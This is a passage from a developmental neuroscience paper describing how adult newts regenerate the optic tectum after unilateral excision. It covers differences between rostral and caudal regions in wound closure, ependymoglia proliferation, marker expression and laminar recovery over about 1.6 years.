Wound bridging by brain cells at 2–4 wpl was observed in the medial-to-caudal region (filled arrowheads), but not in the rostral region (open arrowheads). (E) The most caudal region of regenerating mesencephalon at 0 dpl (n=4) and at 1 wpl–10 dpl (n=4), showing that the earliest wound closing occurs around the isthmus (yellow dotted lines). Bottom left panels show two rostrocaudal levels of the most caudal mesencephalon. Wound bridging by brain cells at 1 wpl–10 dpl was observed around the isthmus (filled arrowheads), but not in more rostral adjacent sections (open arrowheads). Right panels are high magnification images of boxed regions in left panels. (F) High magnification images of boxed regions in D, showing that the rostral region has regenerated an abnormal arrangement of the cellular layer, whereas the medial-to-caudal region has completed progressive maturation of the laminar structure along the medial to caudal axis. Yellow asterisks indicate the tectal laminar structure. (A–F) Mes, Mesencephalon; OT, Optic tectum; Teg, Tegmentum; Tel, Telencephalon; Dien, Diencephalon; Cb, Cerebellum; Met, Metencephalon; r0, Rhombomere 0 (Isthmus); R, Rostral; C, Caudal; D, Dorsal; V, Ventral. Scale bars: 1 mm in A,B; 250 µm in C–F. To characterize regeneration-competent phenotypes, we then asked whether and when regenerating brains recovered tectal lamination, a hallmark of the OT (Fig. 1C), by performing serial cross-sectioning of samples fixed at different times of regeneration between 0 and 87 weeks post-lesion (wpl). Hematoxylin and Eosin (HE) staining showed recognizable patterns of cytoarchitecture of regenerating brains, which could be divided into five distinct stages separated by different time periods: 0 days post-lesion (dpl), 1 wpl–10 dpl, 2–4 wpl, 6–30 wpl, and 87 wpl (Fig. 1D-F). Global wound closure occurred at 2–4 wpl (Fig. 1D), prior to the formation of the laminar structure at 6–30 wpl (Fig. 1D,F). During wound closure, the medial-to-caudal stumps were covered with cells and meninges, whereas in the rostral level, meninges alone seemed to tighten the open wound without regenerative cell invasion (Fig. 1D, arrowheads). Moreover, we found that in the earliest stage of wound closure at 1 wpl–10 dpl, the right and left sides of the unlesioned rhombomere 0 (r0; isthmus) were connected when wound surfaces of more rostral levels remained unconnected (Fig. 1E, arrowheads). At 6–30 wpl, the medial region recovered its lamination, while in the rostral region, lamination was unexpectedly disrupted, although many cell bodies and the white matter were regenerated (Fig. 1F). Immunohistochemistry for TuJ1 in the regenerating brain clearly demonstrated disrupted and orderly arrangement of axonal fibers in the rostral and the medial regions respectively (Fig. S1). In addition, we found that at 6–30 wpl, the caudal region seemed to show a delay in maturation, as indicated by the fact that we could not find clear lamination or a growing axonal layer there (Fig. 1F). Over a period of 87 wpl (approximately 1.6 years), medial-to-caudal regions entirely recovered their lamination, while the rostral region remained unchanged from 6–30 wpl (Fig. 1D,F). These results indicated that by 87 wpl, the caudal-half region had completed its regeneration, which had gradually proceeded along the medial to caudal axis, whereas in contrast, the rostral region showed lower regenerative ability, with failure of lamination even at 1.6 years post-lesioning. The two rostrocaudal levels regenerated distinctive cellular subtypes but only the caudal level reconstructed the original cytoarchitecture We then asked whether adult newts can regenerate the original neuronal and ependymoglial subtypes in the proper apicobasal/dorsoventral positions. To molecularly characterize the mesencephalic subregions, we first identified a set of TFs that were expressed in the mesencephalon in a region-specific manner along the dorsoventral axis in intact brains, through immunohistochemical screening using commercially available antibodies (data not shown). Using antibodies against three TFs: Pax7, Lim1/2 and COUP-TFI, we characterized the regional identity of the newt mesencephalon (Fig. 2A,E; Figs S2 and S3). Pax7 was discernibly expressed in the ependymal and neuronal layer of the adult newt OT, in accordance with a previous report (Joven et al., 2013a), and COUP-TFI was broadly expressed in the dorsal sensory area of the mesencephalon, namely the OT and the torus semicircularis (Ts). Lim1/2 was highly expressed in the neuronal layer of the motor tegmentum in the ventral mesencephalon, and expressed at a low level in that of the OT. The expression patterns of these three TFs showed good agreement with those in prior reports about various vertebrate embryos (Fedtsova and Turner, 2001; Matsunaga et al., 2001; Qiu et al., 1994), suggesting that the dorsoventral expression patterns of these TFs in the adult newt mesencephalon are similar to those in the embryonic vertebrate mesencephalon. Molecular characterization of the newt mesencephalic subregions and description of the regenerated cytoarchitecture in two rostrocaudal levels. (A) Immunohistochemistry for Pax7, Lim1/2 and COUP-TFI on medial coronal sections of the intact newt mesencephalon defined as three major subregions (OT, Ts, Teg). The OT is characterized by heterogeneous expression of Pax7, COUP-TFI and Lim1/2 in the neuronal layer. (B,C) The Pax7-expressing unilateral OT was removed (B, n=4) and regenerated (C, n=3) after surgery. EdU-labeled newly generated cells were detected broadly in the injured area in 6 wpl regenerates, and some of them expressed Pax7 (positive, arrowheads; negative, arrows). (D) Schematic drawing of left-side view of the expression patterns of Pax7, Lim1/2 and COUP-TFI in the excised brain. (E,F) Immunohistochemistry for ependymoglia markers (GFAP, Msi1), a neuronal marker (HuC/D) and regional markers (Pax7, Lim1/2, COUP-TFI) on coronal sections of intact (E, n=3) and regenerated (F, n=3) mesencephalons reveals that the original cellular diversity in the OT was regenerated within 20–30 wpl at all rostrocaudal levels, whereas only the medial-to-caudal level recovered the apical-basal orientation of GFAP+ radial processes of Msi1+ ependymoglia cells like that in the intact mesencephalon (medial sections). (G) Schematic representation of immunohistochemical results. Asterisks indicate the regenerated area. Dotted lines indicate shapes of the mesencephalon, the roof plate and dissected surfaces. Ve, Ventricle; Ts, Torus semicircularis; p1-2, Prosomeres 1-2; Hyp, Hypothalamus; r1, Rhombomere 1. Scale bars: 250 µm in A,B,C (left panel) and E,F; 50 µm in C (right panels). We then examined whether a unilateral Pax7+ OT could be successfully removed and regenerated after surgery. By using anti-Pax7 and anti-COUP-TFI antibodies to detect the respective antigens as dorsal markers, we demonstrated successful removal of the Pax7+ OT from the ipsilateral mesencephalon, leaving the COUP-TFI+ Ts (Fig. 2B), as illustrated in Fig. 2D. Lineage tracing experiments with the nucleotide analog 5-ethyl-2′-deoxyuridine (EdU) revealed that the excised region was filled with numerous EdU+ newly generated cells, and that subpopulations of these cells expressed Pax7 (Fig. 2C), indicating that several neuronal subtypes, including Pax7+ neurons, were regenerated by 6 wpl. Next, we investigated whether the original cellular subtypes were regenerated in specific apicobasal/dorsoventral positions of the brain. In the intact brain, apical lining ependymoglia cells expressed Msi1 in their cell bodies and extended their GFAP+ radial processes toward the brain surface, whereas HuC/D+ pan-neurons were closely packed in the parenchymal region (Fig. 2E). In the OT, Pax7 is expressed both in ependymoglia cells and a subpopulation of neurons, however, expression levels of Pax7 protein and cellular properties differed by cellular subtypes: neurons in the Msi1− parenchymal region were recognized as Pax7high scattered cells, while ependymoglia cells in the Msi1+ ependymal layer were recognized as Pax7low closely packed cells (Fig. S3). Thus, intact OTs comprised three neuronal subtypes (Pax7high, COUP-TFI+ and Lim1/2+ neurons) and Pax7low ependymoglia cells that included cells composing the dorsal roof plate (Fig. 2E,G). At 20–30 wpl, the medial-to-caudal region showed recovery of the correct radial topography of GFAP+ radial processes of Msi1+ ependymoglia cells and the HuC/D+ neuronal layer that comprised Pax7high, COUP-TFI+ and Lim1/2+ neurons (Fig. 2F). In contrast, the rostral region showed a disorganized structure displaying abnormal arrangement of Msi1+ ependymoglia cells, the GFAP+ radial processes and HuC/D+ neuronal layer, although Lim1/2+, Pax7high and COUP-TFI+ neurons were regenerated and the cluster of Pax7low ependymoglia cells in the dorsal roof plate was exceptionally well formed along the entire rostrocaudal axis (Fig. 2F). We summarized the regenerated cytoarchitecture of both rostral and medial-to-caudal levels in Fig. 2G. To investigate the regeneration process of OT-specific ependymoglia cells and neurons in detail, we evaluated the timing of recovery of Pax7+ ependymoglia cells and Pax7+ neurons in the lesioned and unlesioned mesencephalic lobes in the same individual. When we counted the number of Pax7+ ependymoglia cells and Pax7+ neurons, we judged these cell types not only by expression levels of Pax7, but also by adjacent sections stained with the antibody against Msi1 (Fig. 3A,B) and additionally by their cellular properties (Fig. 3B′). Quantification of the average number of Pax7high neurons and Pax7low ependymoglia cells in coronal sections (Fig. 3C) revealed rapid regeneration of Pax7low ependymoglia cells within 2 wpl, (n=3, P=0.248; Fig. 3D). In contrast, the Pax7high neuronal population was virtually absent from the regenerating brain at 2 wpl (n=3, *P=0.0167; Fig. 3D), and was gradually increased over 20–30 weeks (n=3, P=0.0506; Fig. 3D). Rapid regeneration of Pax7low ependymoglia cells and subsequent differentiation into the Pax7high neurons occurred in all of the rostrocaudal planes (Fig. 3D′), indicating that the production of OT-specific Pax7low NSCs and their differentiation are not strongly dependent on the position along the rostrocaudal body axis. All rostrocaudal levels rapidly regenerate Pax7low ependymoglia cells and gradually recover Pax7high neurons. (A–B′) Immunohistochemistry for Pax7 and Msi1 on adjacent coronal sections of the regenerating brain at 6 wpl, showing that Pax7+ ependymoglia cells and neurons in the OT have different expression levels of Pax7 and distinct locations and morphologies. Dotted lines indicate shapes of the mesencephalon and dissected surfaces. Asterisks indicate the regenerated area. Boxed regions as depicted in A. (B) Pax7high neurons exhibiting a rounded morphology were found in the Msi1− parenchyma (arrowheads), while Pax7low ependymoglia cells displaying epithelial morphologies were found in the Msi+ ependymal layer. These evaluation criteria are summarized in B′. (C) For counting cells, coronal sections were obtained from four different rostrocaudal levels (nos. 1-4, from rostral to caudal). By using adjacent coronal sections for Msi1 immunostaining, we counted the number of Pax7high neurons and Pax7low ependymoglia cells according to the evaluation criteria. Right panel depicts a typical image of sectioning. (D) Stacked bar chart shows the average number of Pax7low ependymoglia cells and Pax7high neurons in four coronal sections of regenerating OT [lesioned (les.) and unlesioned (unles.) side] at 0 dpl, 2 wpl, 6–10 wpl and 20–30 wpl (n=3 animals, mean±s.e.m., ns>0.05, *P≤0.05, **P≤0.01; Welch's t-test). (D′) Stacked bar chart shows rostrocaudal and right and left distributions of the number of Pax7low ependymoglia cells and Pax7high neurons summarized in D (n=3 animals, mean±s.e.m.). Scale bar: 250 µm in A; 50 µm in B. Active proliferation at early stages in the caudal level caused Msi1+ ependymoglia cells to be in a wound-covering formation Why did the rostral and caudal levels show different abilities of brain architectural regeneration, despite the fact that the number of OT-specific ependymoglia cells recovered to the original number in the entire mesencephalon? To answer this, we investigated the spatio-temporal proliferation pattern of Msi1+ ependymoglia cells during regeneration by performing analysis of cell proliferation in sequential coronal sections, by monitoring of EdU incorporation to mark S-phase cell, or monitoring of mitosis marker pH3 (Fig. 4A,B). Proliferation was detected as the number of EdU+/Msi1+ S-phase cells or pH3+/Msi1+ M-phase cells in each coronal section. When we calculated the average numbers of these cells, we found that both S-phase- and M-phase-Msi1+ ependymoglia cells were not detected at 0 dpl, and that their numbers increased between 10 dpl and 2 wpl, and then EdU+ S-phase-cells were decreased by 4 wpl (Fig. 4C,D). Strikingly, by comparing three rostrocaudal levels around the time of the proliferative phase at 10 dpl and 2 wpl, we found that the number of S-phase ependymoglia cells in the caudal level was significantly higher than the numbers in the medial and the rostral levels (Fig. 4E,F). Quantification of M-phase ependymoglia cells revealed a similar trend of high numbers in the caudal region at 10 dpl, in comparison to the medial and the rostral levels (Fig. S4A). At the end of the proliferative phase, i.e. at 4 wpl, proliferating cells were evenly distributed throughout the medial-to-caudal levels (Fig. 4G; Fig. S4C). Immunohistochemical analysis of regenerating brains revealed that the spatial arrangement of proliferative ependymoglia cells was also dramatically different between the rostral (Fig. 4H, arrowheads) and medial-to-caudal (Fig. 4H, arrows) levels. At 2 wpl, proliferating Msi1+ ependymoglia cells bridged the lesioned and unlesioned mesencephalic lobes only in the medial-to-caudal levels. After the entire rostrocaudal wound surfaces were closed to recover a tubular structure of the brain at 4 wpl, medial-to-caudal regenerated Msi1+ ependymoglia cells changed their histological properties from a uniformly packed stratified or folded cell layer into a typical single ependymal layer during 4–10 wpl (Fig. 4H, arrows). In contrast, in the rostral level at 4–10 wpl, regenerated Msi1+ ependymoglia cells were only localized in the roof plate region, leading to the formation of an abnormal gap between the newly formed and the previously existing Msi1+ ependymal layer (Fig. 4H, arrowheads), i.e. to incomplete structural regeneration. However, in 10-week regenerates as well as 20–30-week regenerates (Fig. 2F), the Msi1+/Pax7+ roof plate was regenerated in both rostrocaudal levels (Fig. 4H,I, asterisks). The above results indicate that during unilateral OT regeneration, ependymoglia cells in the caudal level underwent a burst of proliferation compared with those in the rostral-to-medial levels, which seems to contribute to the formation of a continuous Msi1+ ependymal layer, including the roof plate. Whereas in the rostral level, the tubular topology of the brain was recovered without extensive proliferation of ependymoglia cells, thus resulting in abnormal regeneration that had a gap between the newly reconstructed roof plate and the previously existing ependymal layer. The earliest differentiated cells were found in the caudoventral mesencephalon, around the isthmus Cellular differentiation would also be crucial for regeneration of complex brain structures. To visualize actively differentiating regions after the proliferation phase, which occurs between 10 dpl and 4 wpl (Fig. 4), we examined the distribution of newly generated EdU+ cells in 4–6 wpl regenerates after pulse labeling with EdU at 1 and 2 wpl (Fig. 5A). Serial horizontal sections revealed that EdU+ cells emerged as the predominant population in the caudal mesencephalon (Fig. 5B,C; Fig. S5). In the caudodorsal edge, EdU+/Msi1high ependymoglia cells maintained an undifferentiated state until at least 4 wpl (Fig. 5C) and expressed Pax7 (Fig. 5E). In contrast, in the caudoventral region, we found the EdU+/Msi1low parenchymal region (Fig. 5C, arrow) occupied by HuC/D+ early-differentiated cells expressing Pax7 and Lim1.2 (Fig. 5D-F; Fig. S5C, arrows). Early differentiation occurs around the isthmus. (A) Experimental designs of EdU short-term labeling for detection of proliferating cells, and EdU long-term labeling for cell fate tracing of proliferated cells. (B) Schematic representation of section levels used for immunohistochemistry and EdU detection (level 1 and level 3 for panels C–F). The results from six horizontal levels are shown in Fig. S5. (C) EdU detection and immunohistochemistry for Msi1 on horizontal sections at two dorsoventral levels of the lesioned brain at 0 dpl and 4 wpl, showing that Msi1low/EdU+ cells can be found predominantly in the caudoventral mesencephalon at the early regeneration stage (arrow). In contrast, caudodorsal mesencephalon maintained undifferentiated ependymoglia cells (Msi1high/EdU+) at the same stage. (D-F) Caudodorsal and caudoventral sections adjacent to C (4 wpl) showed that Msi1low/EdU+ cells in the caudoventral mesencephalon (C-F, arrows) expressed a pan-neural marker HuC/D (D), Pax7 (E) and/or Lim1/2 (F). In contrast, Msi1high/EdU+ undifferentiated ependymoglia cells in the caudodorsal mesencephalon expressed Pax7 (E), and did not express HuC/D (D) and Lim1/2 (F). (G) Coronal sections of the caudal mesencephalon at 2 wpl and 6 wpl, showing that EdU-labeled cells were actively proliferating around the r0 (isthmus) between 2 wpl and 6 wpl. (H,I) Coronal sections of the caudal mesencephalon at 0 dpl and 6 wpl, showing that Pax7+ (H) and Lim1/2+ (I) early-differentiated cells were observed in the caudoventral region, around the isthmus. Arrows indicate the same caudoventral position around the isthmus, where we found early-differentiated cells. Dotted lines indicate shapes of the mesencephalon. Scale bars: 250 µm. Coronal images corresponding to the region in which we found early-differentiated cells revealed that Pax7 and Lim1/2 were expressed in subpopulations of parenchymal cells near rhombomere 0 (r0; isthmus) (Fig. 5G-I, arrows). It is known that r0 lacks Pax7 expression, whereas rhombomere 1 (r1) in the metencephalon strongly expresses Pax7 in newts (Joven et al., 2013a). We therefore concluded that early-differentiated Pax7+ cells are r1 cells in the metencephalon resulting from a hyperplastic response (Fig. S5B,B′, arrows), but we could not determine the region to which the early-differentiated Lim1/2+ cells belonged. Caudoventral ependymoglia cells produced multiple kinds of progenies along the rostrodorsal direction We then asked whether caudoventral ependymoglia cells have the potential to regenerate bona fide OT cells, not just hypertrophic scars. To address this question, we electroporated a CAG promoter-driven GFP construct under the tol2 system into the caudoventral stump to visualize the cell fate of ependymoglia cells in the caudoventral region (Fig. 6A,B). The in vivo electroporation method has been well established to be useful for specific labeling of ventricular ependymoglia cells of adult newts (Notopthalmus viridescens) with high specificity (Berg et al., 2011). We have also performed preliminary experiments of in vivo electroporation using P. waltl and showed that the majority (>95%) of first labeled cells were ventricular ependymoglia cells possessing long radial processes, assessed by morphological criteria (Fig. S6). Caudoventral ependymoglia cells serve as a driving force for wound closure and simultaneously produce mature efferent neurons at a very early stage. (A,B) Schema of electroporation to label caudoventral ependymoglia cells in the ipsilateral mesencephalon, and of the experimental protocol after electroporation. By using an EGFP reporter plasmid and a Tol2 transposase expression vector (A), it was observed that EGFP signals could be strongly sustained in progenies of initially labeled ependymoglia cells, presumably because the reporter gene was integrated into the genome after electroporation. (C) Immunohistochemistry for GFP and GFAP on coronal sections of an unlesioned control at 2 weeks after electroporation. High magnification images of boxed regions show GFP-labeled cells have a radial morphology typical of GFAP+ ependymoglia cells (right panels). (D,E) Images of a lesioned mesencephalon after electroporation at 0 dpl (D) and 2 wpl (E) observed using a fluorescence stereoscopic microscope. The caudoventral stump in the ipsilateral mesencephalon was labeled by GFP at 0 dpl, and was raised up to the level of the contralateral optic tectum at 2 wpl. Arrows indicate the tractus tecto-isthmicus (tism), tractus tectothalamicus (tth) and tractus tectobulbospinalis rectus (tbspr) projections that were regenerated within 2 weeks. (F1–F8) Immunohistochemistry for GFP and GFAP on serial coronal sections of the electroporated regenerating brain at 2 wpl. Corresponding positions are depicted in E, and F6-F8 are approximate positions labeled with GFP at 0 dpl. (G-I) High magnification images and schematic images of boxed regions in F3, F7 and F6 respectively, reveal that GFP+ cells can be divided into three morphologically different cell types: unipolar cells (G), neuronal cells (H) and neuroepithelial-like cells (I). (I′) Hoechst staining of the regenerating brain at 2 wpl revealed that the ependymal layer of the lesioned side of the mesencephalon had a neuroepithelial-like morphology (asterisk). (J,J′) High magnification images of boxed regions in F2 and F3, showing that GFAP+ radial processes of ependymoglia cells covered the wound surface and GFP+ unipolar cells migrated in the caudoventral-to-rostrodorsal direction along processes. (K) Pax7 expression was localized in the dorsal domain of the regenerated ependymal layer. Arrowhead indicates the expression boundary of Pax7. Rh, rhombencephalon. Scale bars: 250 µm in D–F8, K; 50 µm in C,G–J′. In unlesioned controls, GFP signals were hardly detectable by stereomicroscopic examination at 2 weeks after electroporation (data not shown), because GFP-labeled ependymoglia cells remained in the apical area maintaining the undifferentiated state (Fig. 6C). In contrast, in lesioned brains (Fig. 6D, n=3), GFP signals were broadly detected in the caudal mesencephalon at 2 wpl (Fig. 6E). In addition, we detected axonal GFP expression (Fig. 6E, arrows) that accorded with major efferent tectal projections as previously reported in the intact newt mesencephalon, namely the tractus tecto-isthmicus (tism), tractus tectothalamicus (tth) and tractus tectobulbospinalis rectus (tbspr) (Nieuwenhuys et al., 1998). These observations suggest that within 2 wpl, progenies of GFP-labeled caudoventral ependymoglia cells or themselves are able to produce long-distance efferent projections which are possibly involved in OT-specific neuronal circuits. To further characterize descendants of GFP-labeled ependymoglia cells in the surrounding tissue environment, we performed immunohistochemical analysis on serial coronal sections using antibodies against GFP and GFAP (Fig. 6F1-F8). In regenerates, GFP-labeled cells were morphologically different from typical ependymoglia cells (Fig. 6C), and could be classified into the following three morphological types: unipolar cells, neuronal cells and neuroepithelial-like cells (Fig. 6G-I, respectively). Unipolar cells and neuronal cells were widely distributed in medial-to-caudal levels (Fig. 6F2-F8), not being limited to the caudal pole of the ependymal layer that was first labeled (Fig. 6F6-F8), suggesting that these cells migrated after lesioning. Unipolar cells were clustered together in a relatively inner area of the gray matter, including the ependymal layer (Fig. 6F3,G). In addition, we found that GFAP+ radial processes bridged the gap between wound surfaces and formed a scaffold for GFP+ unipolar progenies migrating in the caudoventral-to-rostrodorsal direction (Fig. 6J,J′). GFP-labeled neurons were found in the outermost layer of the gray matter and extended long axons into the pre-existing axonal layer in a parallel fashion (Fig. 6F4-F7,H). This structure indicates that these neurons are efferent neurons, and their axonal projections are displayed in Fig. 6E. The last morphological type of GFP-labeled cells, neuroepithelial-like cells, were emerged in the ependymal layer of the caudal mesencephalon during regeneration (Fig. 6I′; Fig. S7). The regenerated ependymal layer was already regionalized as distinguished by the dorsal expression of Pax7 at 2 wpl (Fig. 6K). We found that on the lesioned side, neuroepithelial-like cells formed a thick ependymal layer in comparison with the unlesioned control side (Fig. 6I′). However, we noted that in the caudal pole, the thick ependymal layer was present on both sides that seemed to form the segmental curved shape bridging the right-and-left mesencephalic lobes together at several dorsoventral levels (Fig. S7). DISCUSSION Ependymoglia cells serve as a cell source for CNS regeneration upon brain injuries in regenerative animals (Becker and Becker, 2015). However, the sequential process of brain regeneration whereby ependymoglia cells produce the highly organized cytoarchitecture of the adult brain has remained elusive. Here, we investigated large-scale brain regeneration in adult newts, and long-term observation over the period of 1 year revealed spatio-temporal ependymoglia behavior that led to both perfect and imperfect structural regeneration within an intraindividual animal. Three models have previously been used for studies of relatively large-scale brain regeneration in highly regenerative adult animals, namely, partial excision of the dorsal telencephalon in axolotl (Amamoto et al., 2016), partial excision of the cerebellum in zebrafish (Kaslin et al., 2017), and partial removal of tissue within the unilateral OT of newt (Minelli et al., 1987; Okamoto et al., 2007). The results obtained using the first two of these models have revealed unexpected limitations in structural brain regeneration, i.e. adult axolotl and zebrafish regenerate either insufficient original cellular subtypes or aberrant axial cellular arrangements (Amamoto et al., 2016; Kaslin et al., 2017). The newt studies, in contrast, have shown that upon partial removal of the unilateral OT, neural tissues including cholinergic neurons, the retinotectal projection area, and the laminar structure in the OT, are regenerated within 6 months (Minelli et al., 1987; Okamoto et al., 2007), implying that adult newts may have a strong capacity for regeneration of a structurally normal brain. To investigate the details of such structural brain regeneration from adult NSCs, a description of the ultimately achieved cytoarchitecture of the regenerated brains is necessary. However, it remains unknown whether perfect structural regeneration that combines recoveries of brain regionalization and the original tissue structure occurs in adult newts. Furthermore, why regenerative animals show different regeneration-competent phenotypes depending on the animal species remains a largely unanswered question. In this study, we excised a whole unilateral OT of adult newts, and confirmed the excised region by molecularly defining the newt mesencephalic subregions using region-specific cellular markers (Pax7, COUP-TFI and Lim1/2) and ependymoglial makers (GFAP and Msi1) (Fig. 2; Figs S2 and S3). Using these markers in combination with HE staining, we found that upon unilateral OT excision, newts can regenerate the laminar structure and their original cellular subtypes, the Pax7+/COUP-TFI+/Lim1/2+ mixed neuronal population and Pax7+ ependymoglia cells, in parts of the regenerated region within 20–30 weeks (Figs 1 and 2). Moreover, electroporation results clearly showed regeneration of long-distance efferent projections (Fig. 6E). This is the first report, to our knowledge, of complete structural brain regeneration restoring the original cellular subtypes in the proper apicobasal/dorsoventral positions, in addition to the long-distance neuronal circuit, after a large-scale brain excision in an adult vertebrate. Most importantly, structural regeneration occurred only in the caudal half of the mesencephalon, while in contrast, the rostral level regenerated a disorganized brain structure that lacked the laminar structure and contiguous ependymal layer despite regenerating the same neuronal subtypes as the caudal level (Figs 1 and 2). Similarly, a limitation of structural brain regeneration that results in a lack of either regeneration of original cellular subtypes or their proper axial cellular arrangement has been reported in axolotl telencephalons and zebrafish cerebellums after the underwent the partial removal of the respective brain subregion (Amamoto et al., 2016; Kaslin et al., 2017). In the present study, different regeneration-competent phenotypes along the rostrocaudal axis within the same individual allowed us to clarify the process necessary for structural brain regeneration, especially by focusing on the NSC behavior. Wound closure in brain regeneration has been defined as an initial process of regeneration that fills in injuries by proliferation and/or migration using surrounding NSCs, and failure to regenerate has been explained by the absence of wound-closing ability (Endo et al., 2007; Yoshino and Tochinai, 2004), but how resident ependymoglia cells reestablish or fail to reestablish the brain patterning through initial wound closure has not yet been described. We show here that perfect or imperfect regeneration of brain patterning can be recognized at early stages, by comparing the wound closure process between two rostrocaudal levels (Figs 1 and 4). We found that although both axial levels completed wound closing and regenerated the Pax7+ roof plate structure, only the caudal level regenerated Pax7+ NSCs (ependymoglia cells) that were juxtaposed with the pre-existing ependymal layer (Fig. 4). Our cell counting results showed that during 10 dpl–2 wpl, cell proliferation activities of Msi1+ ependymoglia cells in the caudal mesencephalon were clearly higher than those in the rostral-to-medial region (Fig. 4; Fig. S4), suggesting that the caudal NSC activity is likely to be a driving force for regenerating the contiguous ependymal layer found in the medial-to-caudal mesencephalon. Indeed, by using in vivo electroporation, we elucidated parts of the wound closure process by which progenies of the caudoventral ependymoglia cells migrated in the caudoventral-to-rostrodorsal direction through cell migration and/or cell proliferation (Fig. 6). At the cellular level, we found that morphologically three types of cells were involved in early stages of brain regeneration: unipolar cells, neuronal cells and neuroepithelial-like cells (Fig. 6G-I). An interesting finding regarding wound closure is that unipolar progenies migrate to bridge the wound surfaces along bundles of GFAP+ radial processes of ependymoglia cells (Fig. 6F1-F8,J,J′). The mechanism by which radial processes are arranged, which is presumably required for determining the direction of migration of cells, and the fate of unipolar cells themselves remain to be further addressed. Overall, our findings indicate that possible causes of brain regeneration failure derive not only from the absence of wound closure (Endo et al., 2007) but also from an improper arrangement of ependymoglia cells during recovery of a tubular topology of the brain. In contrast, perfect structural regeneration occurs under the condition that regenerated ependymoglia cells bridge the wound to recover a continuous ependymal layer at later stages (Fig. 4). However, there are still many unanswered questions about how several cell types, including ‘unipolar cells’, play cooperative roles in the initial wound closure and regeneration. Similarities and differences between brain regeneration and development Neuroepithelial NSCs are one of the most important cell types in vertebrate brain patterning during development, since they convey the positional identity to their progenies, and in particular, neuroepithelial secondary organizing centers at specific boundaries between brain subdomains organize the specification of each brain subregion identity via secretion of morphogens (Briscoe and Small, 2015; Vieira et al., 2010; Wurst and Bally-Cuif, 2001). In the embryonic mesencephalon, there are three secondary organizer areas involved in axial cell fate determination: the isthmus, the dorsal roof plate and the ventral floor plate. Similarly to mesencephalic development, we found that neuroepithelial-like tissue appeared over a wide range of the regenerating brain at 2 wpl, especially on the lesioned side and the caudal pole of the mesencephalon (Fig. 6I′; Fig. S7). Previous studies have demonstrated that a neuroepithelial type of ependymoglia cells plays an important role in CNS regeneration by expanding the regenerating field of the axolotl spinal cord (Rodrigo Albors et al., 2015) or by predominantly generating the missing neuronal subtypes in the zebrafish cerebellum (Kaslin et al., 2017). We also observed a dorsoventral segmentation in the neuroepithelial-like layer in the regenerating mesencephalon, by sectioning it into 80µm thick coronal sections (Fig. S7). However, in this study we could not find detectable molecular markers to visualize the dorsoventral polarity on the mesencephalic ependymal layer (except Pax7). Intriguingly, different adhesion properties of distinctive dorsoventral levels in the embryonic mesencephalon account for the formation of autonomous units of these precursors (Li et al., 2005). Further work will be needed to identify fine-grained regionalization by using markers for cell adhesion molecules as the candidates for the responsible factors. The most interesting findings of the present work are two prominent behaviors of regenerating cells around the roof plate and the isthmus. First, the lesioned Pax7+ roof plate exhibited a self-organizing regenerative ability to regain its original structure along the dorsal midline of the mesencephalon, regardless of whether other regenerated areas eventually recovered the perfect OT structure or not (Figs 2 and 4). It was not only in the roof plate; rapid recovery of Pax7+ ependymoglia cells by 2–10 wpl occurred in all the rostrocaudal levels and then Pax7+ neurons were gradually regenerated in the dorsal area (Fig. 3). Second, in contrast to gradual differentiation of Pax7+ OT neurons, we observed the earliest differentiation of Pax7+ r1 and Lim1/2+ mesencephalic cells around the regenerating ipsilateral isthmus (Fig. 5), suggesting that the isthmic region may provide a neurogenic niche at a very early stage of unilateral OT regeneration. In this study, how regenerated neuronal subtypes were finally mixed together in the OT remained unanswered. To answer this question, the dynamics of neuronal regeneration is worth considering. Curiously, the neuronal regeneration sequence bears some resemblance to development. In OT development in chicks, efferent neurons are the first differentiated cell types produced from neuroepithelial cells (Gray and Sanes, 1991, 1992; Reiner and Karten, 1982). This is similar to our electroporation results in that both observations have revealed the early emergence of efferent neurons and a neuroepithelial type of cells during OT development or regeneration (Fig. 6). Moreover, tectal lamination, which is formed by the invasion of unmyelinated fibers (Roth et al., 1990), appears as a rostral-to-caudal wave of maturation in the development of various non-mammalian vertebrates (LaVail and Maxwell Cowan, 1971; Schmidt and Roth, 1993; Straznicky and Gaze, 1972; Thomas et al., 2006), in accord with our results obtained from long-term staging of OT regeneration, which proceeded in a rostral-to-caudal direction over the course of more than 1 year, and the caudal pole of the mesencephalon, including the isthmus and the roof plate, formed the laminar structure at the end (Fig. 1). Such striking similarities between development and regeneration strongly suggest that in the caudal half of the mesencephalon, structural brain regeneration shares cell-intrinsic mechanisms that govern vertebrate CNS development, after proliferation and proper arrangement of NSCs. By contrast, the following point differs: in development, neuroepithelial NSCs uniformly distribute throughout the primordial brain and proceed to successive steps of brain morphogenesis (Götz and Huttner, 2005; Smith and Schoenwolf, 1997). Whereas, in OT regeneration, ‘modules’ of boundary-domain NSCs around the roof plate and the isthmus play an active part in the local self-organization, proper wound closure and early differentiation, thus only their neighboring fields will be able to regain the original cytoarchitecture of the brain (Fig. 7). Altogether, we provide a detailed description of large-scale brain regeneration in adult newts, as summarized in Fig. 7, showing that ways of regeneration-specific wound closure can determine the outcome of structural regeneration of the brain cytoarchitecture. These findings show that that regenerative events start locally in the boundary-domain of the brain, and this could yield important insights for unravelling the cellular basis of various regenerative abilities of adult vertebrate brains. Model of newt brain regeneration. Schematic drawings of regenerating brains viewed from the same angle illustrate different regeneration stages upon unilateral OT excision, showing that both perfect and imperfect structural regeneration along the rostrocaudal axis can be attributed to wound closing, differentiation and maturation processes. Epithelialization and proliferation (1–4 weeks): Wound surfaces are immediately covered with meninges (Fig. 1). The wound closure with regenerative cell invasion initially occurs around the isthmus, and then occurs along the caudal to medial axis (Fig. 1). Regenerative proliferation starts in Msi1+ ependymoglia cells, mostly at the caudal level (Fig. 4). The original size of the region-specific ependymoglia cell population (Pax7+) is roughly recovered (Fig. 3), and in particular, the Pax7+ roof plate structure is self-organized within 4 wpl (Fig. 4). Bilateral mesencephalic domains are fused by neuroepithelial-like ependymoglia cells at each dorsoventral level of the caudal pole of the mesencephalon (Fig. S7). Migration and differentiation around the isthmus (1–4 weeks): Unipolar cells migrate along radial processes to cover the caudal-to-medial level but not the rostral level (Fig. 6). At the same time, efferent tectal neurons (presumably Lim1/2+ cells) and Pax7+ r1 neurons in the metencephalon are rapidly differentiated around the isthmus (Figs 5 and 6). Radial growth and medial lamination (6–30 weeks): Regenerated ependymal layer in the caudal-to-medial level undergoes radial growth (Figs 1 and 4). The rostral level lacks the apical Msi1+ ependymal layer that is fused to the pre-existing one, and thus regenerates disrupted brain architecture except for the self-organized roof plate (Figs 2 and 4). Caudal pole lamination (30–90 weeks): Different neuronal subtypes (Pax7+, Lim1/2+ and COUP-TFI+) are juxtaposed to form the original OT composition (Fig. 2). Maturation of tectal laminar structure 